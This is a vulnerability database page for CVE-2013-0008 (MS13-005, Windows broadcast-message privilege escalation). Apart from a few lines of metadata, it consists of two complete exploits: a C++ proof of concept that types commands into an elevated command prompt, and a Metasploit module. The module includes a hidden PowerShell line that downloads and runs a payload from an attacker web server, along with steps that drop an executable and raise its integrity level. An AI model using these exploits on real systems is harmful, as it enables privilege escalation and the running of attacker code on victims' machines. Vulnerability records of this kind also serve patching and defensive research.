Related Weaknesses
CWE-ID |
Weakness Name |
Source |
CWE-264 |
Category : Permissions, Privileges, and Access Controls Weaknesses in this category are related to the management of permissions, privileges, and other security features that are used to perform access control. |
|
Metrics
Metrics |
Score |
Severity |
CVSS Vector |
Source |
V2 |
7.2 |
|
AV:L/AC:L/Au:N/C:C/I:C/A:C |
[email protected] |
EPSS
EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.
EPSS Score
The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.
EPSS Percentile
The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.
Exploit information
Exploit Database EDB-ID : 24485
Publication date : 2013-02-10 23h00 +00:00
Author : 0vercl0k
EDB Verified : No
/*
ms13-005-funz-poc.cpp - Drive a Medium IL cmd.exe via a Low IL
process and message broadcasted
Copyright (C) 2013 Axel "0vercl0k" Souchet - http://www.twitter.com/0vercl0k
This program is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program. If not, see <http://www.gnu.org/licenses/>.
@taviso did all the job, I just followed its blogpost:
-> http://blog.cmpxchg8b.com/2013/02/a-few-years-ago-while-working-on.html
-- amazing.
Cool trick:
-> If you want to set this process to a low IL you can use:
icacls ms13-005-funz-poc.exe /setintegritylevel L
-> The new ms13-005-funz-poc.exe will be now launched as low IL
(you can check it with process explorer)
# Exploit Title: ms13-005-funz-poc.cpp
# Date: 2013-02-05
# Exploit Author: 0vercl0k - https://twitter.com/0vercl0k
# Vendor Homepage: https://www.microsoft.com/
# Version: Windows Vista, Windows Server 2008, Windows 7, Windows
Server 2008 r2, Windows 8, Windows Server 2012, Windows RT (See
http://technet.microsoft.com/fr-fr/security/bulletin/ms13-005)
# Tested on: Windows 7
# CVE : CVE-2013-0008 -
http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-0008
# Video: http://0vercl0k.tuxfamily.org/bl0g/ms13-005-funz/ms13-005-funz-poc.mp4
*/
#include <windows.h>
#include <stdio.h>
int main()
{
STARTUPINFO si = {0};
PROCESS_INFORMATION pi = {0};
PCHAR payload[] = {
"echo \".___ _____ ______________ ______________ \">
%USERPROFILE%\\Desktop\\TROLOLOL",
"echo \"| | / \\ \\__ ___/ | \\_ _____/
\">> %USERPROFILE%\\Desktop\\TROLOLOL",
"echo \"| |/ \\ / \\ | | / ~ \\ __)_
\">> %USERPROFILE%\\Desktop\\TROLOLOL",
"echo \"| / Y \\ | | \\ Y / \\
\">> %USERPROFILE%\\Desktop\\TROLOLOL",
"echo \"|___\\____|__ / |____| \\___|_ /_______ / \">>
%USERPROFILE%\\Desktop\\TROLOLOL",
"echo \" \\/ \\/ \\/
\">> %USERPROFILE%\\Desktop\\TROLOLOL",
"echo \" _______ .___ ________ ________ _____ \">>
%USERPROFILE%\\Desktop\\TROLOLOL",
"echo \" \\ \\ | |/ _____/ / _____/ / _ \\
\">> %USERPROFILE%\\Desktop\\TROLOLOL",
"echo \" / | \\| / \\ ___/ \\ ___ / /_\\ \\
\">> %USERPROFILE%\\Desktop\\TROLOLOL",
"echo \"/ | \\ \\ \\_\\ \\ \\_\\ \\/ |
\\ \">> %USERPROFILE%\\Desktop\\TROLOLOL",
"echo \"\\____|__ /___|\\______ /\\______ /\\____|__ /
\">> %USERPROFILE%\\Desktop\\TROLOLOL",
"echo \" \\/ \\/ \\/ \\/
\">> %USERPROFILE%\\Desktop\\TROLOLOL",
"exit",
NULL
};
printf("1] Spawning a low IL cmd.exe (from a low IL process)..Rdy
? Press to continue\n");
getchar();
si.cb = sizeof(si);
CreateProcess(
NULL,
"cmd.exe",
NULL,
NULL,
TRUE,
CREATE_NEW_CONSOLE,
NULL,
NULL,
&si,
&pi
);
Sleep(1000);
// Yeah, you can "bruteforce" the index of the window..
printf("2] Use Win+Shift+7 to ask explorer.exe to spawn a cmd.exe MI..");
keybd_event(VK_LWIN, 0x5B, 0, 0);
keybd_event(VK_LSHIFT, 0xAA, 0, 0);
keybd_event(0x37, 0x87, 0, 0);
keybd_event(VK_LWIN, 0x5B, KEYEVENTF_KEYUP, 0);
keybd_event(VK_LSHIFT, 0xAA, KEYEVENTF_KEYUP, 0);
keybd_event(0x37, 0x87, KEYEVENTF_KEYUP, 0);
Sleep(1000);
printf("3] Killing now the useless low IL cmd.exe..\n");
TerminateProcess(
pi.hProcess,
1337
);
printf("4] Now driving the medium IL cmd.exe with SendMessage and
HWND_BROADCAST (WM_CHAR)\n");
printf(" \"Drive the command prompt [..] to make it look like a
scene from a Hollywood movie.\" <- That's what we're going to do!\n");
for(unsigned int i = 0; payload[i] != NULL; ++i)
{
for(unsigned int j = 0; j < strlen(payload[i]); ++j)
{
// Yeah, that's the fun part to watch ;D
Sleep(10);
SendMessage(
HWND_BROADCAST,
WM_CHAR,
payload[i][j],
0
);
}
SendMessage(
HWND_BROADCAST,
WM_CHAR,
VK_RETURN,
0
);
}
return EXIT_SUCCESS;
}
Exploit Database EDB-ID : 27296
Publication date : 2013-08-01 22h00 +00:00
Author : Metasploit
EDB Verified : Yes
##
# ## This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
# http://metasploit.com/
##
require 'msf/core'
require 'rex'
require 'msf/core/exploit/exe'
class Metasploit3 < Msf::Exploit::Local
Rank = ExcellentRanking
include Msf::Exploit::Powershell
include Msf::Exploit::EXE
include Msf::Exploit::Remote::HttpServer
include Msf::Exploit::FileDropper
include Msf::Post::File
def initialize(info={})
super( update_info( info,
'Name' => 'MS13-005 HWND_BROADCAST Low to Medium Integrity Privilege Escalation',
'Description' => %q{
The Windows kernel does not properly isolate broadcast messages from low integrity
applications from medium or high integrity applications. This allows commands to be
broadcasted to an open medium or high integrity command prompts allowing escalation
of privileges. We can spawn a medium integrity command prompt, after spawning a low
integrity command prompt, by using the Win+Shift+# combination to specify the
position of the command prompt on the taskbar. We can then broadcast our command
and hope that the user is away and doesn't corrupt it by interacting with the UI.
Broadcast issue affects versions Windows Vista, 7, 8, Server 2008, Server 2008 R2,
Server 2012, RT. But Spawning a command prompt with the shortcut key does not work
in Vista so you will have to check if the user is already running a command prompt
and set SPAWN_PROMPT false. The WEB technique will execute a powershell encoded
payload from a Web location. The FILE technique will drop an executable to the
file system, set it to medium integrity and execute it. The TYPE technique will
attempt to execute a powershell encoded payload directly from the command line but
it may take some time to complete.
},
'License' => MSF_LICENSE,
'Author' =>
[
'Tavis Ormandy', # Discovery
'Axel Souchet', # @0vercl0k POC
'Ben Campbell <eat_meatballs[at]hotmail.co.uk>' # Metasploit module
],
'Platform' => [ 'win' ],
'SessionTypes' => [ 'meterpreter' ],
'Targets' =>
[
[ 'Windows x86', { 'Arch' => ARCH_X86 } ],
[ 'Windows x64', { 'Arch' => ARCH_X86_64 } ]
],
'DefaultTarget' => 0,
'DisclosureDate'=> "Nov 27 2012",
'References' =>
[
[ 'CVE', '2013-0008' ],
[ 'MSB', 'MS13-005' ],
[ 'OSVDB', '88966'],
[ 'URL', 'http://blog.cmpxchg8b.com/2013/02/a-few-years-ago-while-working-on.html' ]
]
))
register_options(
[
OptBool.new('SPAWN_PROMPT', [true, 'Attempts to spawn a medium integrity command prompt', true]),
OptEnum.new('TECHNIQUE', [true, 'Delivery technique', 'WEB', ['WEB','FILE','TYPE']]),
OptString.new('CUSTOM_COMMAND', [false, 'Custom command to type'])
], self.class
)
end
def low_integrity_level?
tmp_dir = expand_path("%USERPROFILE%")
cd(tmp_dir)
new_dir = "#{rand_text_alpha(5)}"
begin
session.shell_command_token("mkdir #{new_dir}")
rescue
return true
end
if directory?(new_dir)
session.shell_command_token("rmdir #{new_dir}")
return false
else
return true
end
end
def win_shift(number)
vk = 0x30 + number
bscan = 0x81 + number
client.railgun.user32.keybd_event('VK_LWIN', 0x5b, 0, 0)
client.railgun.user32.keybd_event('VK_LSHIFT', 0xAA, 0, 0)
client.railgun.user32.keybd_event(vk, bscan, 0, 0)
client.railgun.user32.keybd_event(vk, bscan, 'KEYEVENTF_KEYUP', 0)
client.railgun.user32.keybd_event('VK_LWIN', 0x5b, 'KEYEVENTF_KEYUP', 0)
client.railgun.user32.keybd_event('VK_LSHIFT', 0xAA, 'KEYEVENTF_KEYUP', 0)
end
def count_cmd_procs
count = 0
client.sys.process.each_process do |proc|
if proc['name'] == 'cmd.exe'
count += 1
end
end
vprint_status("Cmd prompt count: #{count}")
return count
end
def cleanup
if datastore['SPAWN_PROMPT'] and @hwin
vprint_status("Rehiding window...")
client.railgun.user32.ShowWindow(@hwin, 0)
end
super
end
def exploit
# First of all check if the session is running on Low Integrity Level.
# If it isn't doesn't worth continue
print_status("Running module against #{sysinfo['Computer']}") if not sysinfo.nil?
fail_with(Exploit::Failure::NotVulnerable, "Not running at Low Integrity!") unless low_integrity_level?
# If the user prefers to drop payload to FILESYSTEM, try to cd to %TEMP% which
# hopefully will be "%TEMP%/Low" (IE Low Integrity Process case) where a low
# integrity process can write.
drop_to_fs = false
if datastore['TECHNIQUE'] == 'FILE'
payload_file = "#{rand_text_alpha(5+rand(3))}.exe"
begin
tmp_dir = expand_path("%TEMP%")
tmp_dir << "\\Low" unless tmp_dir[-3,3] =~ /Low/i
cd(tmp_dir)
print_status("Trying to drop payload to #{tmp_dir}...")
if write_file(payload_file, generate_payload_exe)
print_good("Payload dropped successfully, exploiting...")
drop_to_fs = true
register_file_for_cleanup(payload_file)
payload_path = tmp_dir
else
print_error("Failed to drop payload to File System, will try to execute the payload from PowerShell, which requires HTTP access.")
drop_to_fs = false
end
rescue ::Rex::Post::Meterpreter::RequestError
print_error("Failed to drop payload to File System, will try to execute the payload from PowerShell, which requires HTTP access.")
drop_to_fs = false
end
end
if drop_to_fs
command = "cd #{payload_path} && icacls #{payload_file} /setintegritylevel medium && #{payload_file}"
make_it(command)
elsif datastore['TECHNIQUE'] == 'TYPE'
if datastore['CUSTOM_COMMAND']
command = datastore['CUSTOM_COMMAND']
else
print_warning("WARNING: It can take a LONG TIME to broadcast the cmd script to execute the psh payload")
command = cmd_psh_payload(payload.encoded)
end
make_it(command)
else
super
end
end
def primer
url = get_uri()
download_and_run = "IEX ((new-object net.webclient).downloadstring('#{url}'))"
command = "powershell.exe -w hidden -nop -ep bypass -c #{download_and_run}"
make_it(command)
end
def make_it(command)
if datastore['SPAWN_PROMPT']
@hwin = client.railgun.kernel32.GetConsoleWindow()['return']
if @hwin == nil
@hwin = client.railgun.user32.GetForegroundWindow()['return']
end
client.railgun.user32.ShowWindow(@hwin, 0)
client.railgun.user32.ShowWindow(@hwin, 5)
# Spawn low integrity cmd.exe
print_status("Spawning Low Integrity Cmd Prompt")
windir = client.fs.file.expand_path("%windir%")
li_cmd_pid = client.sys.process.execute("#{windir}\\system32\\cmd.exe", nil, {'Hidden' => false }).pid
count = count_cmd_procs
spawned = false
print_status("Bruteforcing Taskbar Position")
9.downto(1) do |number|
vprint_status("Attempting Win+Shift+#{number}")
win_shift(number)
sleep(1)
if count_cmd_procs > count
print_good("Spawned Medium Integrity Cmd Prompt")
spawned = true
break
end
end
client.sys.process.kill(li_cmd_pid)
fail_with(Exploit::Failure::Unknown, "No Cmd Prompt spawned") unless spawned
end
print_status("Broadcasting payload command to prompt... I hope the user is asleep!")
command.each_char do |c|
print c if command.length < 200
client.railgun.user32.SendMessageA('HWND_BROADCAST', 'WM_CHAR', c.unpack('c').first, 0)
end
print_line
print_status("Executing command...")
client.railgun.user32.SendMessageA('HWND_BROADCAST', 'WM_CHAR', 'VK_RETURN', 0)
end
def on_request_uri(cli, request)
print_status("Delivering Payload")
data = Msf::Util::EXE.to_win32pe_psh_net(framework, payload.encoded)
send_response(cli, data, { 'Content-Type' => 'application/octet-stream' })
end
end
Products Mentioned
Configuraton 0
Microsoft>>Windows_vista >> Version *
Configuraton 0
Microsoft>>Windows_server_2008 >> Version *
Microsoft>>Windows_server_2008 >> Version *
Microsoft>>Windows_server_2008 >> Version -
Configuraton 0
Microsoft>>Windows_7 >> Version *
Microsoft>>Windows_7 >> Version *
Microsoft>>Windows_7 >> Version *
Microsoft>>Windows_7 >> Version -
Configuraton 0
Microsoft>>Windows_server_2008 >> Version r2
Microsoft>>Windows_server_2008 >> Version r2
Configuraton 0
Microsoft>>Windows_8 >> Version -
Microsoft>>Windows_8 >> Version -
Configuraton 0
Microsoft>>Windows_server_2012 >> Version -
Configuraton 0
Microsoft>>Windows_rt >> Version -
References